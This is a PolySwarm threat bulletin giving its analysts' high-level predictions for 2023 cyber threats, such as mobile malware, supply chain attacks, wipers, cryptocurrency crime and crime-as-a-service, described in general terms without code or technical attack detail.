Executive Summary
This threat bulletin features PolySwarm analysts’ predictions for the 2023 threat landscape.
Key Takeaways
- This threat bulletin contains our analysts’ predictions for the 2023 threat landscape.
- Some predictions are based on analyzing trends in threat actor activity and malware over the past year and anticipating an increase in or continuation of that activity.
- Other predictions are based on emerging threats our analysts noted in recent months.
Analysts’ Predictions for 2023
For 2023, our analysts provide the following predictions for the current threat landscape:
An increase in mobile malware
As people worldwide continue to expand mobile phone usage for work, shopping, banking, and even vaccine passports, threat actors are presented with new opportunities for data theft. This broadening landscape will motivate threat actors to find novel ways to target mobile devices. We expect mobile ransomware and infostealers, in particular, to become more prevalent in 2023 relative to 2022.
A continued increase in malware targeting Linux systems and IoT devices
In 2022, we saw many malware families targeting Linux systems and IoT devices. As threat actors gain more understanding of these threat landscapes and an increase in the adoption of easy-to-purchase IoT devices, we expect a continued increase in malware targeting these systems.
Continued cyber activity targeting both Ukraine and Russia
In 2022, we observed ongoing cyber activity paralleled the kinetic Russia-Ukraine conflict. Attacks, including sabotage, espionage, hacktivist attacks, and other cyber activity, were leveraged to give one side of the conflict an advantage or to serve as a warning to the opposition. As the Russia-Ukraine conflict continues, so will cyber activity targeting the two nations and possibly their allies.
Continued software supply chain attacks
In 2020, the now infamous SolarWinds breach saw threat actors leveraging a software supply chain attack to gain access to multiple entities worldwide. In 2021 and 2022, threat actors exploited the Log4shell vulnerability. In 2022, we also observed threat actors leveraging other software supply chain attacks, including targeting PyPi packages. We expect threat actors to continue this trend in 2023, targeting open-source code repositories and third-party cloud and backend vendors used by large corporations and public sector entities.
An increase in attacks targeting satellite communications systems
In 2022, we saw various incidents in which threat actors targeted satellite communications systems. In early 2022, Russian threat actors targeted Viasat, using AcidRain wiper to target Viasat modems. A security researcher also discovered a method for hacking Elon Musk’s Starlink satellite communications service using a homemade circuit board. Starlink proved to be a valuable means of communication during the ongoing Russia-Ukraine conflict, as critical infrastructure in both nations was targeted or became unstable. Additionally, digital nomads, those who have adopted a full-time RV or van lifestyle, and individuals in rural areas not serviced by other ISPs rely on Starlink or other satellite internet providers as their primary source of internet, particularly for remote work. As more companies and individuals adopt satellite communications as their primary internet source, threat actors will have an increased incentive to target these systems. Satellite systems are also used as the primary mode of communication in countries cut off from major internet infrastructure as a result of natural disasters or geopolitical conflict, making them targets of state-sponsored threat actor groups.
Ransomware gangs and other financially motivated threat actors will find new avenues of extortion
In 2022, we saw an increase in double, triple, and even quadruple extortion tactics, with threat actors using novel TTPs to try to force a victim’s hand, increasing the likelihood of ransom payment. We expect threat actors to continue discovering new extortion methods in 2023. One that is already on the horizon and has been used by some gangs is the threat of DDoS and other direct attacks for victims unwilling to pay the ransom.
An increase in cybercrime targeting cryptocurrency
In 2022, threat actors targeted multiple aspects of the DeFi economy. Threat actors were discovered targeting crypto wallets, directly stealing money from cryptocurrency exchanges, and even injecting malware into NFTs. As more people begin to invest in and use cryptocurrency for payments in the coming year, threat actors will broaden their targeting of cryptocurrency. They will find new ways to steal these currencies and target associated exchanges, apps, wallets, and NFTs.
An increase in ransomware and other malware written in Go or Rust
In 2022, we saw many malware and ransomware families branch out, with new variants of existing malware families written in Go or Rust. Threat actors are gravitating to these programming languages because malware written in these languages is faster and more memory efficient. These languages are also more evasive, making reverse engineering and analysis more difficult due to how the code is compiled. Threat actors will continue to take advantage of the benefits offered by these programming languages, using them to create new variants of existing families and new malware to release in the wild.
An increase in wiper malware attacks, including wipers masquerading as ransomware
In 2022, we saw around a dozen new wiper malware families, with some masquerading as ransomware. PolySwarm analysts predict this trend will continue into 2023, with nation-state threat actors and hacktivist groups potentially using wipers for sabotage.
New Crime as a Service offerings
In 2022, we observed multiple crime-as-a-service offerings, including ransomware as a service, DDoS for hire, C2 as a service, and pay-per-install malware services. Threat actors with advanced capabilities will continue to leverage these services to capitalize on less skilled individuals who are motivated by greed, espionage, or a thirst for revenge. Initial access brokers will also continue to sell stolen credentials. As new attack vectors are discovered, and methods are perfected, new crime as a service offerings will emerge in the underground.
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports